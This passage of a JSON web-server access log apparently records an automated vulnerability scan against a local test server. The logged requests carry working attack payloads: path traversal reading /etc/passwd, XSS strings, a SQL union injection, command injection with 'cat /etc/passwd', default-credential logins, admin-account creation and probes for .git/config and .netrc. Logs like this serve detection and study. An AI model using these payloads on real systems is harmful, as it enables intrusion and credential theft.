/bin/wcm/search/gql.servlet.json?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /xml/User/User.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /iNotes/Forms7.nsf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /changePassword?username=administrator HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /CgiStart?page=Single HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /glpi/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"csrfmiddlewaretoken={{csrfmiddlewaretoken}}&username=hadoop&password=hadoop&next=%2F","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /hue/accounts/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"OPTIONS / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"OPTIONS", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%5chttp://127.0.0.1example.com/%2f%2e%2e HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/mail-masta/inc/lists/csvexport.php?pl=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /_next/../../../../../../../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /message?title=x&msg=%26%23%3Csvg/onload=alert(1337)%3E%3B HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-config.php.bak HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /CFIDE/administrator/images/background.jpg HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /redirect.php/%22%3E%3Cscript%3Ealert(%22document.domain%22)%3C/script%3E?subject=server&server=test HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/swagger.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/wcm/search/gql.json?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /axis2/axis2-web/HappyAxis.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /iNotes/Forms8.nsf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/graphql-explorer HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /configurations HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /go/add-on/business-continuity/api/plugin?folderName=&pluginName=../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /glpi2/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /../example.com HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/whizz/plugins/delete-plugin.php?plugin=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"csrfmiddlewaretoken={{csrfmiddlewaretoken}}&username=cloudera&password=cloudera&next=%2F","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /hue/accounts/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pagespeed-global-admin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"127.0.0.1"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webmail/?color=%22%3E%3Csvg/onload=alert(document.domain)%3E%22 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /servlet/taskProc?taskId=shortURL&taskEnv=xml&taskContentType=xml&srcURL=https://google.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /remote/error?errmsg=ABABAB--%3E%3Cscript%3Ealert(1337)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-login.php.bak HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cfide/administrator/images/background.jpg HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/swagger.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/wcm/search/gql.json/a.1.json?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /axis/happyaxis.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /iNotes/Forms85.nsf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/graphql.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.git/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /web-console/ServerInfo.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /t/index.php?action[]=aaaa HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /puppet-ca/v1/certificate_request/29KBxbrgup6czY1SGLr8I2bVB12 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /phppgadmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/mc4wp-debug.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Admin/Access/Setup/Default.aspx?Action=createadministrator&adminusername=stytFA&adminpassword=vVUEuO&adminemail=test@test.com&adminname=test HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /MicroStrategy/servlet/taskProc?taskId=shortURL&taskEnv=xml&taskContentType=xml&srcURL=https://google.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;/root/kerbynet.cgi/scripts/getkey%20../../../etc/passwd;%22 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /CFIDE/administrator/images/componentutilslogin.jpg HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/swagger/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/wcm/search/gql.json/a.4.2.1...json?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /axis2-web/HappyAxis.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/graphql/console HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /iNotes/Forms9.nsf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_sebercart&view=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /administrator/manifests/files/joomla.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.netrc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"nodeId%5Bnodeid%5D=1%20union%20select%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2CCONCAT%28%27vbulletin%27%2C%27rce%27%2C%40%40version%29%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27--+-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /ajax/api/content_infraction/getIndexableContent HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.039","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //%5cexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"{\x22params\x22:\x22w=123\x5C\x22'1234123'\x5C\x22|cat /etc/passwd\x22}\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/edr/sangforinter/v2/cssp/slog_client?token=eyJtZDUiOnRydWV9 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /WebConsole/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_debugbar/open?max=20&offset=0 